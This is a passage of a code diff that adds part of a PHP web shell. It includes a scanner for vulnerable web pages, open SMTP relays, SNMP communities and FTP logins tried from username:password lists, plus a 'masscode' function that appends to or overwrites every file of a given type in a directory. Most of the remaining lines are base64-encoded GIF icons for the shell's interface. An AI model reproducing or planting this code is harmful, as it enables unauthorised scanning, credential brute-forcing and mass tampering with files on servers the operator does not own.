";} +flusheR(); +} +elseif(strstr($page,'@NUKE')) +foreach ($nuke as $cg){ +$nukech=str_replace('@NUKE',$cg,$page); +$url="http://$ip$nukech"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." $url
";} +flusheR(); +} +else{ +$url="http://$ip$page"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." $url
";} +flusheR(); +} +} +} +} +if(!empty($_REQUEST['smtprelay'])){ +if(checkthisporT($ip,25,$timeout)){ +$res=''; +$res=checksmtP($ip,$timeout); +if($res==1){echo "$ip) SMTP relay found.
";$output=1;}flusheR(); +} +} +if(!empty($_REQUEST['snmpscanner'])){ +if(checkthisporT($ip,161,$timeout,1)){ +$com=$_REQUEST['com']; +$coms=$res=""; +if(strstr($com,","))$c=explode(",",$com);else $c[0]=$com; +foreach ($c as $v){ +$ret=snmpchecK($ip,$v,$timeout); +if($ret)$coms .=" $v "; +} +if ($coms!=""){echo "$ip) SNMP FOUND: $coms
";$output=1;} +flusheR(); +} +} +if(!empty($_REQUEST['ftpscanner'])){ +if(checkthisporT($ip,21,$timeout)){ +$usps=explode(',',$_REQUEST['userpass']); +foreach ($usps as $v){ +$user=substr($v,0,strpos($v,':')); +$pass=substr($v,strpos($v,':')+1); +if($pass=='[BLANK]')$pass=''; +$ftp=@ftp_connect($ip,21,$timeout); +if ($ftp){ +if(@ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) $ip System type: ".ftp_systype($ftp)."
";} +} +flusheR(); +} +} +} +if($output)echo "
"; +flusheR(); +} +$time=time()-$start; +echo "Done! ($time seconds)"; +if(!empty($buglist))unlink($buglist); +} +else{ +$chbox=(extension_loaded('sockets'))?"TCPUDP":""; +echo "

Port scanner:
Target:
From:
To:
Timeout:
$chbox$hcwd
"; +$host = substr($host,0,strrpos($host,".")); +echo "
security scanner:
From: NS lookup
To:xxx.xxx.xxx.$hcwd
Timeout:
Port scanner:
Get web bannerWebserver security scanning   SMTP relay check
FTP password:
SNMP:

"; +} +} + +if ($act == "masscode") +{ +if(isset($_POST['dir']) && + $_POST['dir'] != '' && + isset($_POST['filetype']) && + $_POST['filetype'] != '' && + isset($_POST['mode']) && + $_POST['mode'] != '' && + isset($_POST['message']) && + $_POST['message'] != '' + ) + { + $dir = $_POST['dir']; + $filetype = $_POST['filetype']; + $message = $_POST['message']; + + $mode = "a"; //default mode + + + // Modes Begin + + if($_POST['mode'] == 'Apender') + { + $mode = "a"; + } + if($_POST['mode'] == 'Overwriter') + { + $mode = "w"; + } + + if($handle = opendir($dir)) + { + ?> + Overwritten Files :- +
    + +
  • ">
    • + Permission Denied

    "; break; + fwrite($fd,$message); + } + } + ?> +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ Directory + + +
+ Mode + + +
+ File Type + + +
+ +
+ +
+ + +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". + +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", + +"back"=> + +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". + +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". + +"Wg0JADs=", + +"buffer"=> + +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". + +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". + +"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", + +"change"=> + +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". + +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". + +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". + +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". + +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". + +"zMshADs=", + +"delete"=> + +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". + +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". + +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". + +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". + +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". + +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". + +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". + +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". + +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", + +"download"=> + +"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". + +"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", + +"forward"=> + +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". + +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". + +"WqsJADs=", + +"home"=> + +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". + +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". + +"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". + +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", + +"mode"=> + +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". + +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". + +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", + +"refresh"=> + +"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". + +"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". + +"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". + +"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", + +"search"=> + +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". + +"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". + +"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". + +"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". + +"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", + +"setup"=> + +"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". + +"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". + +"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". + +"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". + +"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", + +"small_dir"=> + +"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". + +"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", + +"small_unk"=> + +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". + +"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". + +"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". + +"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". + +"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". + +"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". + +"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". + +"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". + +"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". + +"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". + +"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". + +"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". + +"yAsokBkQADs=", + +"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". + +"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", + +"sort_asc"=> + +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". + +"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", + +"sort_desc"=> + +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". + +"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", + +"sql_button_drop"=> + +"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". + +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". + +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". + +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". + +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". + +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". + +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". + +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". + +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". + +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". + +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". + +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". + +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". + +"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". + +"AQEAOw==", + +"sql_button_empty"=> + +"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". + +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". + +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". + +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". + +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". + +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". + +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". + +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". + +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". + +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". + +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". + +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". + +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". + +"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", + +"sql_button_insert"=> + +"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". + +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". + +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". + +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". + +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". + +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". + +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". + +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". + +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". + +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". + +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". + +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". + +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". + +"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", + +"up"=> + +"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". + +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". + +"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". + +"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", + +"write"=> + +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". + +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". + +"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". + +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", + +"ext_asp"=> + +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". + +"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". + +"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", + +"ext_mp3"=> + +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". + +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". + +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", + +"ext_avi"=> + +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". + +"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". + +"PYXCyg+V2i44XeRmSfYqsGhAAgA7", + +"ext_cgi"=> + +"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". + +"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". + +"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". + +"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". + +"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". + +"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". + +"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". + +"RYtMAgEAOw==", + +"ext_cmd"=> + +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". + +"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". + +"dmrYAMn1onq/YKpjvEgAADs=", + +"ext_cpp"=> + +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". + +"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". + +"Eq7YrLDE7a4SADs=", + +"ext_ini"=> + +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". + +"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". + +"SnEjgPVarHEHgrB43JvszsQEADs=", + +"ext_diz"=> + +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". + +"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". + +"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". + +"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". + +"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". + +"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". + +"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". + +"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". + +"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". + +"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". + +"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". + +"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". + +"Ow==", + +"ext_doc"=> + +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". + +"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". + +"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", + +"ext_exe"=> + +"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". + +"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". + +"xhIAOw==", + +"ext_h"=> + 